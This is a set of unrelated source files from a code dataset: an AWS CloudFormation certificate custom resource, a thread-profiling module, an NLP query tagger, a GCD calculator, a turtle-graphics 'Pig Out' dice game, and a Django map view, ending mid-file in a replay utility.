\"\"\"\n\n n = n.rstrip('.')\n zones = {domain['DomainName'].rstrip('.'): domain for domain in props['DomainValidationOptions']}\n\n parts = n.split('.')\n\n while len(parts):\n if '.'.join(parts) in zones:\n return zones['.'.join(parts)]\n\n parts = parts[1:]\n\n raise RuntimeError('DomainValidationOptions' + ' missing for ' + n)\n\n hash_func = lambda v: hashlib.new('md5', json_dumps(v)).hexdigest()\n\n def add_tags():\n \"\"\"\n Add tags from the ResourceProperties to the Certificate\n\n Also adds logical-id, stack-id, stack-name and properties tags, which are used by the custom resource.\n\n \"\"\"\n\n tags = shallow_copy(e['ResourceProperties'].get('Tags', []))\n tags += [\n {'Key': 'cloudformation:' + 'logical-id', 'Value': e['LogicalResourceId']},\n {'Key': 'cloudformation:' + 'stack-id', 'Value': e['StackId']},\n {'Key': 'cloudformation:' + 'stack-name', 'Value': e['StackId'].split('/')[1]},\n {'Key': 'cloudformation:' + 'properties', 'Value': hash_func(e['ResourceProperties'])}\n ]\n\n acm.add_tags_to_certificate(**{'CertificateArn': e['PhysicalResourceId'], 'Tags': tags})\n\n def send_response():\n \"\"\"\n Send a response to cloudformation\n\n \"\"\"\n\n log_info(e)\n\n response = urlopen(Request(e['ResponseURL'], json_dumps(e), {'content-type': ''}, method='PUT'))\n\n if response.status != 200:\n raise Exception(response)\n\n try:\n i_token = hash_func(e['RequestId'] + e['StackId'])\n props = e['ResourceProperties']\n\n acm = client('acm', region_name=props.get('Region'))\n\n e['Status'] = 'SUCCESS'\n\n if e['RequestType'] == 'Create':\n\n if REINVOKED not in e:\n e['PhysicalResourceId'] = 'None'\n request_cert()\n\n validate()\n\n if not wait_for_issuance():\n return reinvoke()\n\n elif e['RequestType'] == 'Delete':\n\n if e['PhysicalResourceId'] != 'None':\n if e['PhysicalResourceId'].startswith('arn:'):\n delete_certificate(e['PhysicalResourceId'])\n else:\n delete_certificate(find_certificate(props))\n\n elif e['RequestType'] == 'Update':\n\n if replace_cert():\n log_info('Update')\n\n if find_certificate(props) == e['PhysicalResourceId']:\n # This is an update cancel request.\n\n # Try and delete the new certificate that is no longer required\n try:\n acm = client('acm', region_name=e['OldResourceProperties'].get('Region'))\n log_info('Delete')\n delete_certificate(find_certificate(e['OldResourceProperties']))\n except:\n log_exception('')\n\n # return success for the update - nothing changed\n return send_response()\n\n if REINVOKED not in e:\n request_cert()\n\n validate()\n\n if not wait_for_issuance():\n return reinvoke()\n else:\n if 'Tags' in e['Old' + 'ResourceProperties']:\n acm.remove_tags_from_certificate(**{\n 'CertificateArn': e['PhysicalResourceId'],\n 'Tags': e['Old' + 'ResourceProperties']['Tags']\n })\n\n add_tags()\n\n else:\n raise RuntimeError(e['RequestType'])\n\n return send_response()\n\n except Exception as ex:\n log_exception('')\n e['Status'] = 'FAILED'\n e['Reason'] = str(ex)\n return send_response()\n","sub_path":"src/troposphere_dns_certificate/certificate.py","file_name":"certificate.py","file_ext":"py","file_size_in_byte":12191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"358799369","text":"\nimport acm\n\nblockCalls = acm.FDictionary()\nwutCount = acm.WorkUnitThreads().PoolSize()\nstartShiftSize = 2\nendShiftSize = 256\nfactorShift = 2\nmaxBlockCalls = 100\n\ndef startMTProfiling(eii):\n blockCalls.Clear()\n hook = acm.GetFunction(\"callVAHook\", 3)\n acm.FACMServer().RegisterCallVAHook(hook)\n print (\"MT Call profiling enabled\")\n\ndef stopMTProfiling(eii):\n acm.FACMServer().RegisterCallVAHook(None)\n print (\"MT Call profiling disabled\")\n \ndef callVAHook(time, block, args):\n if block.IsMTSafe(): \n calls = blockCalls.At(block)\n if calls:\n calls.Add(args.Clone())\n else:\n calls = acm.FArray()\n calls.Add(args.Clone())\n blockCalls.AtPut(block, calls)\n \ndef runProfiling(eii):\n tester = MultiThreadTester(blockCalls)\n tester.ProcessProfiledCalls()\n tester.OutputProfilingData()\n \nclass ProfilingData:\n def __init__(self, args, numberOfThreads, cost):\n self.m_args = args\n self.m_numberOfThreads = numberOfThreads\n self.m_cost = cost\n \n def Args(self):\n return self.m_args\n \n def NumberOfThreads(self):\n return self.m_numberOfThreads\n \n def Cost(self):\n return self.m_cost\n \nclass ProfilingDataHelper:\n def __init__(self, singleData, multiData):\n self.m_singleData = singleData\n self.m_multiData = multiData\n \n def SingleData(self):\n return self.m_singleData\n \n def MultiData(self):\n return self.m_multiData\n \nclass MultiThreadTester:\n def __init__(self, blockCalls):\n self.m_timeProfiler = acm.FTimeProfiler()\n self.m_profilingDataDictionary = acm.FDictionary()\n self.m_blockCalls = blockCalls\n self.m_minimumShiftsDictionary = acm.FDictionary()\n \n def ProcessProfiledCalls(self):\n defaultContext = acm.GetDefaultContext()\n module = self.GetModuleForStorage(defaultContext)\n if module:\n if self.BlockCalls():\n for block in self.BlockCalls().Keys():\n i = 0\n self.WriteToModule(defaultContext, module, block.DocKey(), 1, \"True\")\n calls = self.BlockCalls().At(block)\n argumentsArray = acm.FArray()\n for args in calls:\n if i < maxBlockCalls:\n argumentsArray.Add(args)\n else:\n break\n i = i + 1\n self.RunTest(block, argumentsArray, startShiftSize, factorShift, endShiftSize)\n self.StoreFBlockInfoData(defaultContext, module)\n else:\n print (\"No module selected\")\n \n def RunTest(self, block, argumentsArray, start = 1, factor = 1, max = 1):\n self.StartProfiling(block)\n count = start\n self.MinimumShiftsDictionary().AtPut(block, 0)\n while count <= max:\n for args in argumentsArray:\n newArgs = self.ModifyArguments(block, args, count)\n profilingDataSingle = self.CallBlockWithThreads(block, newArgs, count, 1)\n profilingDataMulti = self.CallBlockWithThreads(block, newArgs, count, wutCount)\n profilingDataHelper = ProfilingDataHelper(profilingDataSingle, profilingDataMulti)\n self.AddProfilingData(block, count, profilingDataHelper)\n numberOfThreads = self.GetMinimumThreads(block) \n if numberOfThreads > 0:\n self.MinimumShiftsDictionary().AtPut(block, numberOfThreads)\n break\n count = count * factor\n self.EndProfiling(block)\n \n def CallBlockWithThreads(self, block, args, shifts, numberOfThreads):\n acm.WorkUnitThreads().PoolSize(numberOfThreads)\n minProfilingData = None\n i = 0\n while i < 10:\n try:\n results = block.CallVA(args)\n except:\n print (\"Could not call block \", block, \" with args \", args)\n acm.WorkUnitThreads().PoolSize(wutCount)\n profilingData = self.GetProfilingResults(block, args, shifts, numberOfThreads)\n self.ClearProfilingData(block)\n if 0 == i or profilingData.Cost() < minProfilingData.Cost():\n minProfilingData = profilingData\n i = i + 1\n return minProfilingData\n \n def ModifyArguments(self, block, args, totalCount):\n modifiedArgument = None\n i = 0\n newArgs = []\n blockIsMethod = block.IsKindOf(\"FMethod\")\n for arg in args:\n if (blockIsMethod and 0 == i) or modifiedArgument:\n newArgs.append(arg)\n else:\n modifiedArgument = self.GenerateVectorFromArgument(totalCount, arg)\n newArgs.append(modifiedArgument)\n i = i + 1\n if not modifiedArgument:\n print (\"No argument to modify in argument list\", args)\n return newArgs\n \n def StartProfiling(self, function):\n self.TimeProfiler().Profile(function)\n \n def EndProfiling(self, function):\n self.TimeProfiler().DropProfile(function)\n \n def GetProfilingResults(self, block, args, shifts, numberOfThreads):\n profile = self.TimeProfiler().GetProfile(block)\n profilingData = ProfilingData(args, numberOfThreads, profile.Cost())\n return profilingData\n \n def AddProfilingData(self, block, shifts, profilingData):\n shiftsDictionary = self.ProfilingDataDictionary().At(block)\n if shiftsDictionary:\n profilingDataArray = shiftsDictionary.At(shifts)\n if profilingDataArray:\n profilingDataArray.Add(profilingData)\n else:\n profilingDataArray = acm.FArray()\n profilingDataArray.Add(profilingData)\n shiftsDictionary.AtPut(shifts, profilingDataArray)\n else:\n profilingDataArray = acm.FArray()\n profilingDataArray.Add(profilingData)\n shiftsDictionary = acm.FDictionary()\n shiftsDictionary.AtPut(shifts, profilingDataArray)\n self.ProfilingDataDictionary().AtPut(block, shiftsDictionary)\n \n def ClearProfilingData(self, function):\n profile = self.TimeProfiler().GetProfile(function)\n profile.Clear()\n \n def OutputProfilingData(self):\n for block in self.ProfilingDataDictionary().Keys():\n shiftsDictionary = self.ProfilingDataDictionary().At(block)\n sortedKeys = shiftsDictionary.Keys().Sort()\n for shift in sortedKeys:\n profilingDataArray = shiftsDictionary.At(shift)\n print (\"-----------------------------------\")\n print (\"block \", block)\n print (\"shifts \", shift)\n for profilingDataHelper in profilingDataArray:\n print (\" -----------------------------------\")\n print (\" ---------Single--------------------\")\n print (\" threads \", profilingDataHelper.SingleData().NumberOfThreads())\n print (\" cost \", profilingDataHelper.SingleData().Cost())\n print (\" args \", profilingDataHelper.SingleData().Args())\n print (\" ---------Multi--------------------\")\n print (\" threads \", profilingDataHelper.MultiData().NumberOfThreads())\n print (\" cost \", profilingDataHelper.MultiData().Cost())\n print (\" args \", profilingDataHelper.MultiData().Args())\n \n def WriteToModule(self, context, module, functionString, minimumThreads, useMultiThreading):\n blockInfo = context.GetExtension(acm.FBlockInfo, acm.FBlock, acm.FSymbol(functionString))\n blockInfoTemplate = 'FBlock:' + str(functionString) + ' = \\n\\\n MT=' + useMultiThreading + ' \\n\\\n MWMT=' + str(minimumThreads) +' \\n'\n context.EditImport('FBlockInfo', blockInfoTemplate, False, module)\n module.Commit()\n\n def StoreFBlockInfoData(self, defaultContext, module):\n for block in self.MinimumShiftsDictionary().Keys():\n numberOfThreads = self.MinimumShiftsDictionary().At(block)\n if numberOfThreads > 0:\n self.WriteToModule(defaultContext, module, block.DocKey(), numberOfThreads, \"True\")\n else:\n self.WriteToModule(defaultContext, module, block.DocKey(), 0, \"False\")\n \n def GetModuleForStorage(self, context):\n modules = self.FilterBuiltInModules(context.Modules())\n if modules.Size() > 0:\n module = acm.UX().Dialogs().SelectObject(acm.UX().SessionManager().Shell(), 'Select module for storing block information', 'FExtensionModule', modules, modules.At(0))\n else:\n print (\"No modules found in default context\")\n return module\n \n def FilterBuiltInModules(self, modules):\n notBuiltInModules = acm.FArray()\n if not modules == None:\n for module in modules:\n if not module.IsBuiltIn():\n notBuiltInModules.Add(module)\n return notBuiltInModules\n \n def GetMinimumThreads(self, block):\n shiftsDictionary = self.ProfilingDataDictionary().At(block)\n sortedKeys = shiftsDictionary.Keys().Sort()\n optimalWut = 0\n for shift in sortedKeys:\n profilingDataArray = shiftsDictionary.At(shift)\n multiIsBetter = self.AnalyzeProfilingDataForShift(profilingDataArray)\n if multiIsBetter and 0 == optimalWut:\n optimalWut = shift\n return optimalWut\n \n def AnalyzeProfilingDataForShift(self, array):\n totalSingleDataCost = 0.0\n totalMultiDataCost = 0.0\n for proflingDataHelper in array:\n totalSingleDataCost = totalSingleDataCost + proflingDataHelper.SingleData().Cost()\n totalMultiDataCost = totalMultiDataCost + proflingDataHelper.MultiData().Cost()\n return totalSingleDataCost > totalMultiDataCost\n \n def GenerateVectorFromArgument(self, numberOfCalls, start):\n vector = acm.FArray()\n vector.Add(start)\n i = 1\n while i < numberOfCalls:\n newValue = start\n vector.Add(newValue)\n i = i + 1\n lot = acm.GetFunction('lot', 2)(vector, 1)\n return lot\n \n def TimeProfiler(self):\n return self.m_timeProfiler\n \n def ProfilingDataDictionary(self):\n return self.m_profilingDataDictionary\n \n def BlockCalls(self):\n return self.m_blockCalls\n \n def MinimumShiftsDictionary(self):\n return self.m_minimumShiftsDictionary\n\n","sub_path":"Extensions/MultiThreadProfilingModule/FPythonCode/MTProfiling.py","file_name":"MTProfiling.py","file_ext":"py","file_size_in_byte":10870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"440609104","text":"from nltk.tokenize import word_tokenize\nfrom collections import Counter\n\nfrom ellipsis.types import exported as types\nfrom ellipsis.definitions import types_to_definitions, definition_type_count\n\n\ndef tokenize(query: str) -> [str]:\n tokens = word_tokenize(query)\n offset = 0\n for token in tokens:\n offset = query.find(token, offset)\n yield (token, offset, offset + len(token))\n offset += len(token)\n\n\ndef highlight(query: str) -> (int, int, str, str):\n result = []\n\n for (token, start, end) in tokenize(query):\n for typ in types:\n _token = typ.check(token)\n if _token is not None:\n result.append({\n 'token': _token,\n 'start': start,\n 'end': end,\n 'type': typ.name()\n })\n\n return result\n\n\ndef recommend(query: str):\n found_types = [h['type'] for h in highlight(query)]\n found_type_count = dict(Counter(found_types))\n\n recommended_definitions = {}\n\n for type_name, type_count in found_type_count.items():\n for definition_name in types_to_definitions[type_name]:\n definition_name = definition_name.name()\n if definition_name not in recommended_definitions:\n recommended_definitions[definition_name] = definition_type_count[definition_name].copy()\n\n definition = recommended_definitions[definition_name]\n definition[type_name] = max(0, definition[type_name] - type_count)\n\n recommended_definitions = [{'name': k, 'fields': v} for k, v in recommended_definitions.items()]\n recommended_definitions.sort(key=lambda x: sum(x['fields'].values()))\n return recommended_definitions\n","sub_path":"ellipsis/processor.py","file_name":"processor.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"308242276","text":"import math\nfrom collections import Counter\n\n# Функция разложения числа на произведение простых чисел\ndef prost (x):\n res=[]\n for i in range(2,int(math.sqrt(x))+1):\n while x%i==0:\n res.append(i)\n x=x/i\n if x!=1: res.append(int(x))\n return res\n\n# Ввод первончальных данных: количество чисел и сами числа\nmy_list=[]\nsize=int(input('Введите количество элементов - '))\nfor i in range(1,size+1):\n n=int(input('Число ' + str(i) + ' - '))\n my_list.append(n)\n\n\n# Разложение введенных чисел на простые\nrazl=[]\nfor i in range(size):\n razl.append(prost(my_list[i]))\n\n# Поиск пересечений в получившихся списках\ncommon_items = list((Counter(razl[0]) & Counter(razl[1])).elements())\nif size>2:\n for i in range(2,size):\n common_items = list((Counter(razl[i]) & Counter(common_items)).elements())\n\n# Собственно нахождение НОД\nNOD=1\nfor i in range(len(common_items)):\n NOD=NOD*common_items[i]\n\nprint('Наибольший общий делитель равен: ', NOD)\n","sub_path":"math/NOD_for_n_numbers.py","file_name":"NOD_for_n_numbers.py","file_ext":"py","file_size_in_byte":1235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"483330829","text":"#Import libraries\r\nimport random\r\nimport turtle \r\n\r\n#**\r\n# * Chris Duncan\r\n# * Object Oriented Progrmaing\r\n# * Spring 2020 Semester, week 8, Final Class Project\r\n# * Pig Out! The game. A Python version of the game pass the pig.\r\n\r\n#Set varabiles\r\nscoreP1 = 0\r\nscoreP2 = 0\r\nglobal turn\r\nturn = 0\r\nglobal playagain\r\nplayagain = 'y'\r\nglobal player\r\nplayer = 1\r\n\r\n#Set up graphical display\r\ndraw=turtle.Turtle()\r\ndraw.pensize(5) \r\n\r\n#Pig renderings\r\ndef sider():\r\n x = random.randint(-300, 300) #Random placing of shapes on cavas\r\n y = random.randint(-300, 300)\r\n draw.penup()\r\n draw.setpos(x,y)\r\n draw.pendown()\r\n draw.forward(150) \r\n draw.right(90)\r\n draw.forward(100)\r\n draw.right(90) \r\n draw.forward(150) \r\n draw.right(90)\r\n draw.forward(100)\r\n draw.penup()\r\n draw.setpos(x,y)\r\n draw.left(180)\r\n draw.forward(50)\r\n draw.left(90)\r\n draw.forward(70)\r\n draw.pendown()\r\n if pigRoll.spot == 1: #Determines if pig is showing a dot on it's side\r\n draw.circle(5)\r\n draw.penup() \r\n draw.home() \r\n draw.ht()\r\n draw.st()\r\n\r\ndef razorback():\r\n x = random.randint(-300, 300)\r\n y = random.randint(-300, 300)\r\n draw.penup()\r\n draw.setpos(x,y)\r\n draw.pendown()\r\n draw.left(105)\r\n draw.forward(150) \r\n draw.right(215)\r\n draw.forward(155)\r\n draw.left(110) \r\n draw.forward(90) \r\n draw.left(140)\r\n draw.penup()\r\n draw.setpos(x,y)\r\n draw.left(10)\r\n draw.forward(50)\r\n draw.pendown()\r\n if pigRoll.spot == 1:\r\n draw.circle(5)\r\n draw.penup() \r\n draw.home() \r\n draw.ht()\r\n draw.st()\r\n\r\ndef trotter():\r\n x = random.randint(-300, 300)\r\n y = random.randint(-300, 300)\r\n draw.penup()\r\n draw.setpos(x,y)\r\n draw.pendown()\r\n draw.left(25)\r\n draw.forward(150) \r\n draw.right(115)\r\n draw.forward(100)\r\n draw.right(105) \r\n draw.forward(137) \r\n draw.right(40)\r\n draw.penup()\r\n draw.setpos(x,y)\r\n draw.right(125)\r\n draw.forward(100)\r\n draw.pendown()\r\n if pigRoll.spot == 1:\r\n draw.circle(5)\r\n draw.penup() \r\n draw.home() \r\n draw.ht()\r\n draw.st()\r\n\r\ndef snouter():\r\n x = random.randint(-300, 300)\r\n y = random.randint(-300, 300)\r\n draw.penup()\r\n draw.setpos(x,y)\r\n draw.pendown()\r\n draw.right(105)\r\n draw.forward(150) \r\n draw.left(215)\r\n draw.forward(155)\r\n draw.right(110) \r\n draw.forward(90) \r\n draw.left(40)\r\n draw.penup()\r\n draw.back(50)\r\n draw.pendown()\r\n if pigRoll.spot == 1:\r\n draw.circle(5)\r\n draw.penup() \r\n draw.home() \r\n draw.ht()\r\n draw.st()\r\n\r\ndef leaner():\r\n x = random.randint(-300, 300)\r\n y = random.randint(-300, 300)\r\n draw.penup()\r\n draw.setpos(x,y)\r\n draw.pendown()\r\n draw.left(25)\r\n draw.forward(150) \r\n draw.right(115)\r\n draw.forward(65)\r\n draw.right(90) \r\n draw.forward(135) \r\n draw.right(40)\r\n draw.penup()\r\n draw.setpos(x,y)\r\n draw.right(130)\r\n draw.forward(100)\r\n draw.pendown()\r\n if pigRoll.spot == 1:\r\n draw.circle(5)\r\n draw.penup() \r\n draw.home() \r\n draw.ht()\r\n draw.st()\r\n\r\ndef oinker(): #Draws a pig face when player looses all points\r\n draw.home()\r\n #head\r\n n = 6\r\n draw.pencolor('red')\r\n for i in range(n): #Loop to minimze amount of code needed for polygon\r\n draw.forward(100) \r\n draw.right(360/n) #determining the exterior angle of the polygon\r\n draw.penup()\r\n draw.home()\r\n draw.pencolor('blue')\r\n #nose R\r\n draw.right (50)\r\n draw.forward(115) \r\n draw.pendown() \r\n for i in range(n): \r\n draw.forward(12) \r\n draw.right(360/n) \r\n draw.penup()\r\n draw.home\r\n #nose L\r\n draw.right(100)\r\n draw.forward(35)\r\n draw.pendown()\r\n for i in range(n): \r\n draw.forward(12) \r\n draw.right(360/n) \r\n draw.penup()\r\n draw.home()\r\n #ear L\r\n draw.right(175)\r\n draw.forward(5)\r\n draw.pendown()\r\n for i in range(n): \r\n draw.forward(30) \r\n draw.right(360/n) \r\n draw.penup()\r\n draw.home()\r\n #ear R\r\n draw.right(15)\r\n draw.forward(60)\r\n draw.left(65)\r\n draw.forward(55)\r\n draw.pendown()\r\n for i in range(n): \r\n draw.forward(30) \r\n draw.right(360/n) \r\n draw.penup()\r\n draw.home()\r\n #eye L\r\n draw.right(260)\r\n draw.back(45)\r\n draw.pendown()\r\n for i in range(n): \r\n draw.forward(6) \r\n draw.right(360/n) \r\n draw.penup()\r\n draw.home()\r\n #eye R\r\n draw.forward(75)\r\n draw.left(90)\r\n draw.back(45)\r\n draw.pendown()\r\n for i in range(n): \r\n draw.forward(6) \r\n draw.right(360/n) \r\n draw.penup()\r\n draw.goto(-300,-300)\r\n draw.st()\r\n\r\ndef instructions(): #Displays instructions at start of game\r\n print ('Here are the rules of Pig Out - aka Pass The Pig:')\r\n print ('Each player is trying to get to a score of 100')\r\n print ('A player may roll or pass')\r\n print ('Each turn involves one player throwing two model pigs, each of which has a dot on one side.\\nThe player gains or loses points based on the way the pigs land.\\nEach turn lasts until the player throwing either rolls the pigs in a way that wipes out their current score, is one sider with a dot and one with out, or decides to stop their turn.')\r\n print ('Sider - The pigs are on their sides, either both with the spot facing upward or both with the spot facing downward - 1 Point')\r\n print ('Double Razorback - The pigs are both lying on their backs - 20 Points')\r\n print ('Double Trotter - The pigs are both standing upright - 20 Points')\r\n print ('Double Snouter - The pigs are both leaning on their snouts - 40 Points')\r\n print ('Double Leaning Jowler - The pigs are both resting between snouts and ears - 60 Points')\r\n print ('Pig Out - If both pigs are lying on their sides, one with the spot facing upwards and one with the spot facing downwards the score for that player is reset to 0 and the turn changes to the next player')\r\n print ('Oinker- If both pigs are touching in any position,[2] then the total score is reset to 0 and the turn changes to the next player')\r\n print ('Mixed Combo - A combination not mentioned above is the sum of the single pigs scores')\r\n print (' Razorback - The pig is lying on its back - 5 Points')\r\n print (' Trotter - The pig is standing upright - 5 Points')\r\n print (' Snouter - The pig is leaning on its snout - 10 Points')\r\n print (' Leaning Jowler - The pig is resting on its snout and ear - 15 Points')\r\n print ('Good Luck!')\r\n print (' ')\r\n\r\ndef pigRoll(): #Function for rolling the pigs and calling the proper rendering. \r\n pigRoll.wipe = 0\r\n pigRoll.passPig = 0\r\n matchingDot = 0\r\n rollP1 = random.randint(0,100) #Random number for Pig 1\r\n rollP1dot = random.randint(1,3) #Determine if Pig 1 has a dot on its side\r\n rollP2 = random.randint(0,100) #Random number for Pig 2\r\n rollP2dot = random.randint(1,3) #Determine if Pig 2 has a dot on its side\r\n if (rollP1dot == rollP2dot) or (rollP1dot + rollP2dot == 5):\r\n matchingDot = 1\r\n if rollP1 == 0:\r\n rollP2 = 0\r\n if rollP2 == 0:\r\n rollP1 = 0\r\n \r\n # Determine which rendering to call and collect points for scoreing \r\n # Pig 1\r\n draw.clear() \r\n draw.pencolor('red')\r\n if rollP1 == 0:\r\n print ('You rolled an Oinker! Your score is reset to zero.')\r\n pigRoll.score1 = 0\r\n pigRoll.wipe = 1\r\n oinker()\r\n rollP1 = 999\r\n if rollP1 < 65: #Random number range is weighted to give rolls real world relative frequencies\r\n print (\"First Pig is a sider\")\r\n shape1 = \"sider\"\r\n if rollP1dot == 1:\r\n pigRoll.spot = 1\r\n else:\r\n pigRoll.spot = 0\r\n if (rollP1 > 0 and rollP1 < 65) and (rollP2 > 0 and rollP2 < 65) and (matchingDot == 1): # determins of same pig shape matching dot or no dot was rolled for both pigs which is worth bonus points\r\n pigRoll.score1 = 1\r\n else:\r\n pigRoll.score1 = 0\r\n sider()\r\n rollP1 = 999\r\n if rollP1 < 88:\r\n print (\"First Pig is a Razorback\")\r\n shape1 = \"razor\"\r\n if rollP1dot == 1:\r\n pigRoll.spot = 1\r\n else:\r\n pigRoll.spot = 0\r\n if (rollP1 > 64 and rollP1 < 88) and (rollP2 > 64 and rollP2 < 88):\r\n pigRoll.score1 = 20\r\n else:\r\n pigRoll.score1 = 5\r\n razorback()\r\n rollP1 = 999\r\n if rollP1 < 96:\r\n print (\"First Pig is a Trotter\")\r\n shape1 = \"trot\"\r\n if rollP1dot == 1:\r\n pigRoll.spot = 1\r\n else:\r\n pigRoll.spot = 0\r\n if (rollP1 > 87 and rollP1 < 96) and (rollP2 > 87 and rollP2 < 96):\r\n pigRoll.score1 = 20\r\n else:\r\n pigRoll.score1 = 5\r\n trotter()\r\n rollP1 = 999\r\n if rollP1 < 99:\r\n print (\"First Pig is a Snouter\")\r\n shape1 = 'snout'\r\n if rollP1dot == 1:\r\n pigRoll.spot = 1\r\n else:\r\n pigRoll.spot = 0\r\n if (rollP1 > 95 and rollP1 < 99) and (rollP2 > 95 and rollP2 < 99):\r\n pigRoll.score1 = 40\r\n else:\r\n pigRoll.score1 = 10\r\n snouter()\r\n rollP1 = 999\r\n if rollP1 < 101:\r\n print (\"First Pig is a Leaning Jowler\")\r\n shape1 = 'lean'\r\n if rollP1dot == 1:\r\n pigRoll.spot = 1\r\n else:\r\n pigRoll.spot = 0\r\n if (rollP1 > 98 and rollP1 < 101) and (rollP2 > 98 and rollP2 < 101):\r\n pigRoll.score1 = 60\r\n else:\r\n pigRoll.score1 = 15\r\n leaner()\r\n rollP1 = 999\r\n \r\n # Pig 2\r\n draw.pencolor('blue')\r\n if rollP2 == 0:\r\n pigRoll.score2 = 0\r\n rollP2 = 999\r\n if rollP2 < 65:\r\n print (\"Second Pig is a sider\")\r\n if rollP2dot == 1:\r\n pigRoll.spot = 1\r\n else:\r\n pigRoll.spot = 0\r\n if shape1 == 'sider':\r\n pigRoll.score2 = 0\r\n else:\r\n pigRoll.score2 = 0\r\n if shape1 == 'sider' and matchingDot == 0:\r\n pigRoll.passPig = 1\r\n sider()\r\n rollP2 = 999\r\n if rollP2 < 87:\r\n print (\"Second Pig is a Razorback\")\r\n if rollP2dot == 1:\r\n pigRoll.spot = 1\r\n else:\r\n pigRoll.spot = 0\r\n if shape1 == 'razor':\r\n pigRoll.score2 = 0\r\n else:\r\n pigRoll.score2 = 5\r\n razorback()\r\n rollP2 = 999\r\n if rollP2 < 95:\r\n print (\"Second Pig is a Trotter\")\r\n if rollP2dot == 1:\r\n pigRoll.spot = 1\r\n else:\r\n spot = 0\r\n if shape1 == 'trot':\r\n pigRoll.score2 = 0\r\n else:\r\n pigRoll.score2 = 5\r\n trotter()\r\n rollP2 = 999\r\n if rollP2 < 98:\r\n print (\"Second Pig is a Snouter\")\r\n if rollP2dot == 1:\r\n pigRoll.spot = 1\r\n else:\r\n spot = 0\r\n if shape1 == 'snout':\r\n pigRoll.score2 = 0\r\n else:\r\n pigRoll.score2 = 10\r\n snouter()\r\n rollP2 = 999\r\n if rollP2 < 101:\r\n print (\"Second Pig is a Leaning Jowler\")\r\n if rollP2dot == 1:\r\n pigRoll.spot = 1\r\n else:\r\n pigRoll.spot = 0\r\n if shape1 == 'lean':\r\n pigRoll.score2 = 0\r\n else:\r\n pigRoll.score2 = 15\r\n leaner()\r\n rollP2 = 999\r\n\r\n# MAIN\r\ninstructions() # Call to instructions\r\nplayer1 = input('Player 1 name: ') #User name input\r\nplayer2 = input('Player 2 name: ')\r\n\r\n\r\nwhile (playagain == 'y' or playagain == 'Y'): #Loop to repeat game play\r\n while (scoreP1 < 100) and (scoreP2 < 100) and (turn != 'q' and turn !='Q'): #Loop to end game play based on score or quit request\r\n while (player == 1) and (scoreP1 < 100 ) and (scoreP2 < 100): #Loop for first player \r\n print (' ')\r\n print (player1, 'rolls the pigs')\r\n pigRoll() #Call to pig rolling function\r\n scoreP1 = (scoreP1 + (pigRoll.score1 + pigRoll.score2))\r\n if pigRoll.wipe == 1:\r\n scoreP1 = 0\r\n player = 2\r\n if scoreP1 >= 100:\r\n print (player1, ' WINS With A Score of ', scoreP1)\r\n print (player2, ' Comes in second with a score of ', scoreP2)\r\n else:\r\n print (' Your score is', scoreP1)\r\n print (' ')\r\n if pigRoll.passPig == 1:\r\n player = 2\r\n print (' Pigout! -no points and the roll passes to next player')\r\n pigRoll.passPig = 0\r\n if scoreP1 < 100 and pigRoll.wipe == 0 and player != 2:\r\n turn = input('Press p to pass the pigs, r to roll again and q to quit: ')\r\n if turn == 'q' or turn == 'Q':\r\n break\r\n elif turn == 'r' or turn == 'R':\r\n player = 1\r\n else:\r\n player = 2\r\n \r\n while (player == 2) and (scoreP1 < 100 ) and (scoreP2 < 100): #Loop for second player\r\n print (' ')\r\n print (player2, 'rolls the pigs')\r\n pigRoll()\r\n scoreP2 = (scoreP2 + (pigRoll.score1 + pigRoll.score2))\r\n if pigRoll.wipe == 1:\r\n scoreP2 = 0\r\n player = 1\r\n if scoreP2 >= 100:\r\n print (player2, ' WINS With A Score of ', scoreP2)\r\n print (player1, ' Comes in second with a score of ', scoreP1)\r\n else:\r\n print (' Your score is', scoreP2)\r\n print (' ')\r\n if pigRoll.passPig == 1:\r\n player = 1\r\n print (' Pigout! -no points and the roll passes to next player')\r\n pigRoll.passPig = 0\r\n if scoreP2 < 100 and pigRoll.wipe == 0 and player != 1:\r\n turn = input('Press p to pass the pigs, r to roll again and q to quit: ')\r\n if turn == 'q' or turn == 'Q':\r\n break\r\n elif turn == 'r' or turn == 'R':\r\n player = 2\r\n else:\r\n player = 1\r\n \r\n #Closing out of game\r\n print (' ')\r\n print ('Final Score:')\r\n print (player1, ': ', scoreP1)\r\n print (player2, ': ', scoreP2)\r\n print ('Good game! Pay up all bets.')\r\n print (' ')\r\n turn = 'r'\r\n player = 1\r\n scoreP1 = 0\r\n scoreP2 = 0\r\n playagain = input('Want to play again? y or n: ')\r\n\r\nprint (' ') \r\nprint ('Thank you! Yall Come back now ya hear!')\r\n#end\r\n","sub_path":"Pig_Out.py","file_name":"Pig_Out.py","file_ext":"py","file_size_in_byte":14908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"244688779","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.template import loader\nfrom .models import BikeRoute\nfrom django.shortcuts import get_object_or_404\nimport json\n\ndef route_view(request, pk=None):\n \"\"\" Main view using Leaflet map in the template, allows for simple route selection\"\"\"\n polyline = [[[]]]\n all_routes = BikeRoute.objects.all() # list of routes used for selection\n if pk:\n bike_route = get_object_or_404(all_routes, pk=pk)\n polyline = bike_route.polyline\n polyline = json.loads(polyline) # convert string to a list\n\n template = loader.get_template('route/map.html')\n context = {\n 'routes': all_routes,\n 'polyline': polyline,\n 'zoom': polyline[0][0][::-1] # reverse coords for map.setView\n }\n return HttpResponse(template.render(context, request))\n\n","sub_path":"route/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"167356720","text":"import os\nimport utils\nimport json\nimport tree_utils\n\ndef show_activity_in_replays(trees_dir):\n dirs = os.listdir(trees_dir)\n for dir in dirs:\n if \"game_\" in dir:\n game_dir_path = os.path.join(trees_dir, dir)\n parts = os.path.split(dir)\n replay_name = parts[1]\n print(\"\")\n show_activity_via_trees(replay_name, game_dir_path)\n\ndef show_activity_via_trees(replay_name,game_dir_path):\n files = os.listdir(game_dir_path)\n files = utils.rename_files_to_ensure_consistent_digits(files)\n fnames_etc = 